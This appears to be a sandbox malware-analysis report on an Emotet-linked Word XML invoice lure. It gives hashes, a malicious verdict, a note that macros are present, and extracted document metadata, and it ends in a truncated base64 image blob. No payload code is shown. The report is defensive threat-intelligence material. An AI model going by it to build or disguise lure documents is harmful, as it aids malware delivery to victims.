File name: | Factura-2019-090005-01-02-2019.doc |
Full analysis: | https://app.any.run/tasks/d6886e6e-0ded-46a1-8750-185a13379300 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | February 18, 2019, 13:23:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 4FB302748C12C77CE2EACF26DCE55A42 |
SHA1: | CDA17A140E0E98047FE34D822238C56D46D1DC67 |
SHA256: | D53F9FD700393C6FEB2C80B82A057B139BDCB99DE6C4BCDDCC718AF502D53701 |
SSDEEP: | 3072:ru2/0IzRJCT8P7Zm4codz/u5iW8EM/FWt:y2/3JdPtiJQ/Fa |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentMacrosPresent: | yes |
---|---|
WordDocumentEmbeddedObjPresent: | no |
WordDocumentOcxPresent: | no |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesCreated: | 2019:02:15 12:35:00Z |
WordDocumentDocumentPropertiesLastSaved: | 2019:02:15 12:35:00Z |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesWords: | 2 |
WordDocumentDocumentPropertiesCharacters: | 12 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 13 |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleRsidVal: | 003B0670 |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentDocSuppDataBinDataName: | l52___32 |
WordDocumentDocSuppDataBinData: | (Binary data 101228 bytes, use -b option to extract) |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsColormruExt: | edit |
WordDocumentShapeDefaultsShapedefaultsColormruColors: | #00aeea |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentBgPictBackgroundBgcolor: | #00AEEA |
WordDocumentDocPrViewVal: | |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrDisplayBackgroundShape: | - |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrRsidsRsidVal: | 00005EB7 |
WordDocumentBodySectPRsidR: | 005E6EE1 |
WordDocumentBodySectPRsidRDefault: | 00B62094 |
WordDocumentBodySectPRRsidRPr: | 00743F44 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictBinDataName: | wordml://h0_627_.S2097_20.Z695_953 |
WordDocumentBodySectPRPictBinData: | /9j/4AAQSkZJRgABAQEAYABgAAD/4QA6RXhpZgAATU0AKgAAAAgAA1EQAAEAAAABAQAAAFERAAQA AAABAAAAAFESAAQAAAABAAAAAAAAAAD/2wBDAAcFBQYFBAcGBQYIBwcIChELCgkJChUPEAwRGBUa GRgVGBcbHichGx0lHRcYIi4iJSgpKywrGiAvMy8qMicqKyr/2wBDAQcICAoJChQLCxQqHBgcKioq KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKir/wAARCAD0AsMD ASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUF BAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0 NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKj pKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QA HwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEE BSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZH SElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0 tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwBa KKK/Qz8WCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii gAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA CiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK KKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAoo ooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii gAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKA CiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK KKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKM8YooAKKKKACiiigAooooAKKKKA CiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK KKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiijPGKA CiiigAooooAKKKXtnP4UAJRRRQAUUUUAFFFFABRRRQAUUUUAFA68iiigAoo7e9FABRRRQAUUUUAF FFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUU UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRR QAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRR9elFABRRRQAUUUUAFFFFAC1f0zQ9S 1iQLp1nJMM4L4wo/4EeK6D4c6XZanrNwNQt0nEUQZFcZAOfToa6jxn4suvDNxb2WmW0ADxbtzA/L zjAAxXmV8ZNVvYUo3l5nvYXLKTw31vETtDy3MzSPhaTtk1q8x/0xg/qx/wAPxq5qnwuspgX0q5kt n7JJ86n+o/WuIv8Axhr2oAifUZUU/wAMPyD9MV7LoTFtAsCxLE26ZJOc/KK8zFzxmHanOer7bHuZ dSy3GqVKnS0XV7ni+u+GdR8Oun9oInlyEhJI2yGP8/0rIr034sf8eWm/9dW/lXmfXgc17OCryr0F Oe58zmmFhhcVKlT20CkrsTpGjeF7GCXxFE99qE671s0fasY9/wDPXtxmmQaj4U1eQWl5ox0syHal zDLkKT0zwP5Gj63dc0YtruH9n2tGc0pPo7/j0ORoJx3rS13RZ9C1Z7Gc7+jRuBgOp6H/AD3FdJq9 7beDWt9KsdOtLi4EIe5nuU3FmPYenT+VXPEr3fZrmcjOngpXn7V8qjv6nE9qXsK7SO9Hh3wdaapY W9v9t1Kdy0jpuEagn5VHbp/OsGPWrc6XqMFzp0Mt1eSeYtx08rPoPzxz3pQxE53cY6Xtv946uEhS spT1avt5XRkUUUdODwa6zz7MKKKKAsxeO3SitHR7rTLNppdUsWvmwBDFv2rnnJY/lXRWEGi+LLa7 tbbTF0y/hiMsTxOSrgdj+lc1XEeyesXbud1DCKuvdmuZ9Nf+GOMpK1PD2itrmpeS0ghgjQyTzHoi Dr+Nasmt+GreTyLXw6txbrx58sxEj+/t/npTnXtLkim35E08LzQ9pUkorpfr9xy1FdF4QsLHUvEM y3lv5trHDJL5RYjABGOR9anOueFSpx4YYHH/AD8tUyxDU3CMW7en+ZcMGpU1UlNRTva9+nojlqKU 4ycDjNJXUeeFFFFABRRRQAUUUUAGelFFFABRQPpmigAooooAKKKKACiiigAooooAKKKKACiiigAo oooAKKKKACiijjj1oAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiig AooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAO6+Ff/Icvf+uA/wDQqPip/wAh2z/69z/6 FSfCwga7eZ4/0cf+hVB8Sr+1vdetxaTpN5URV9hztOema8NJvM7rt+h9Y5RWRpX1v+pxp6V7/oH/ ACL1h/17R/8AoIrwA9K9/wBA/wCResP+vaP/ANBFRnXww+Zpwv8AxKnojjfix/x5ab/11b+VcJ4d iWfxNp0cnKtcJn35zXd/Fj/jy03/AK6t/KvOLS5ks7yG6i+/C6yLn1BzXTl8XLBcq3dziziUYZpz S2Vv0NfxpM8/jC/Mp+44RR6AKKwq7fxHoreJgniDw8BcCZQLi3UjejAY6fT/AB5zWPpng3V7+5VZ 7V7OAHMs042hF7nnqa2oYilGglJ2srWOTFYOvUxTcE2pO6fkzodY1Waw0/w1qEccMlxNa+U/nJuB HyHP1qTxn4pvNL8SPbW9vZyIIkbMsO5uR65rn/FWrW+o61a22nHdZWKrDE3ZuRkj24A/CpfiL/yN 8n/XCP8AlXJRw8XOCmt03+KPRxGLnGlVdOWzivwaZu6p4ovLfwXo98lvZmS5Zw6tDlRgnoM8dKw9 KRJPh7r0zopkE0ZDbemWXpTtb/5Jz4f/AN+T+Zo0f/km2v8A/XWP+a04wjCjeP8AN/7cKpVlUxFp u69n/wC2kyNb+EPDlldpbRXGq6gvmK8y7hCnHQfiP19KoPrOoeLLi00u9WAvJOu2ZItrKOh+oxz+ FaWq2UvibwrpV9pKmeWyi8i5gTl1xjkDv0z9CKx9KtL3QtUstV1Czmt7aO4VWaVdp5zng8njJq6f I4SnL+Jr636GNb2kakacf4VlttbS7Z0WpX2qaJeHTvDOiulpb/KZTaFzOe5J7iszxjp8f2HTdYSz +wy3ilbi32FQrjvg9M8/pWj4lPiq31iWXTbi8uLGc+ZA1uN6hTzjjp/hXN66+uiO3TXpZjvBkjjl YZHbJHaowsW5QkmvPXV+prjppQqQcW100Vlr0KOmW9pdX6RahefYoCDum2bsY7YrsrPT7bTdHvZv CdymrXskRSV921oY+5WPqT/h+FcjZ6LqOoWcl1Y2r3Ecb7HEfLA4z06/lXSeC9JvtM1c6vqUT2Nl bRP5jzjZuyMAAHnrz+FdGMlFpvn2+z3/AFOTLoyUlF09/ta6Lv2JPBtlHP4Q1xpLhbZZCsckxGdk YGW/Qmq1hp/hPWLoadaSX1tcvxDPNgq7fT/9VO8M3CarZ67o0ZEUmoAy2wY4BIJO3+X4Zqr4e8Na qPEVs91Zy2sNrKJZZZV2qApz179O1c8vdlUlKXK91934nXH3oUYQgpLVN/N/d3DQbm38M67qEGs+ YD5L258pcnJI5H4DIqxbeHNB11Hi8P6jcJeqpZYLtR+8A9wP8fpVDVoLnxL4g1O90i3a5iSQE+WM kr90EDqc7c8VoeENCvrXXI9Tv4ZLKzswzySzrsz8pGADz3rSo1GLqqdp2Wnn6GNFOVRYd0+and2e u3e5yUkbRStHIpV0JVlPYjgim1a1O5W91a7uoxhJpnkUH0JOKq16kG3FN7ng1EozajsFFFFUQFFF FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFHHeiigAooooAKK KKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo oAKKKPp0oAKKKKACiiigCWG5mtw4hkZBIMOoJAcehx1Fadld6G4Canp00R7zWkx/9BbI/I1kUlZz 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 